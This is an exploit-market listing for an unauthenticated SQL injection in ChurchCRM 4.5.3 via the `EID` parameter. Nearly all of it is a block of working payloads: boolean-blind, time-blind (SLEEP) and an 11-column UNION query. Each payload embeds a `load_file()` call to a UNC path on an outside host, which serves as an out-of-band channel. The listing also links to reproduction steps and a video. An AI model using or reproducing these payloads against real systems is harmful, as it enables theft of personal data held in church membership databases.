[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ChurchCRM 4.5.3 SQL Injection Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk High
]
0day-ID
0day-ID-38226
Category
web applications
Date add
28-02-2023
Platform
php
## Title: ChurchCRM-4.5.3-121fcc1-SQLi
## Author: nu11secur1ty
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchCRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.

STATUS: HIGH Vulnerability - CRITICAL

[+]Payload:
```mysql
---
Parameter: EID (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
OR NOT 2407=2407

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)

    Type: UNION query
    Title: MySQL UNION query (UTF8) - 11 columns
    Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)

## Proof and Exploit:
[href](https://streamable.com/1eqhw2)

## Time spend:
01:00:00

#  0day.today [2024-12-24]  #